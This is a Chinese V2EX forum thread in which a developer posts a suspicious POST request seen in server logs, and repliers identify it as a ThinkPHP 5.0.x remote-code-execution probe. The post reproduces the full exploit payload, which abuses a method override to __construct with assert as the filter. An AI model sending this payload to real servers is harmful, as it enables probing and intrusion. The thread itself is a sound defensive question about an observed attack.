V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
xzYao
V2EX  ›  问与答

线上收到了这样的一条 POST 请求

  •  
  •   xzYao · 2019-08-13 17:52:46 +08:00 · 2989 次点击
    这是一个创建于 1928 天前的主题,其中的信息可能已经有所发展或是发生改变。

    线上收到了这样的一条 POST 请求:

    curl
    -X POST
    -H "Cache-Control: no-cache"
    -H "Connection: Keep-Alive"
    -H "Content-Length: 196"
    -H "Content-Type: application/x-www-form-urlencoded"
    -H "Host: 115.159.128.48"
    -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
    --data "{"filter":["assert"],"server":{"REQUEST_METHOD":"die(md5(DIRECTORY_SEPARATOR))"},"_method":"__construct"}"
    "http://115.159.128.48/index.php"

    这个看着不像是正常的请求,而且它触发了这样一个报错:

    Symfony\Component\HttpFoundation\Exception\SuspiciousOperationException: Invalid method override "__CONSTRUCT".

    无效的方法重写?有人知道这样的请求是什么意思,为什么会尝试覆盖构造方法吗?

    5 条回复    2019-08-14 11:31:51 +08:00
    bunnyblueair
        1
    bunnyblueair  
       2019-08-13 18:57:46 +08:00
    ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 不能发连接
    beastk
        2
    beastk  
       2019-08-13 22:06:30 +08:00 via iPhone
    测试是否存在漏洞的吧
    Tyler1989
        3
    Tyler1989  
       2019-08-14 11:05:57 +08:00 via Android
    @beastk dalao,你的网站挂了
    beastk
        4
    beastk  
       2019-08-14 11:29:47 +08:00 via iPhone
    @Tyler1989 #3 哪个
    Tyler1989
        5
    Tyler1989  
       2019-08-14 11:31:51 +08:00 via Android
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1060 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 19:01 · PVG 03:01 · LAX 11:01 · JFK 14:01
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.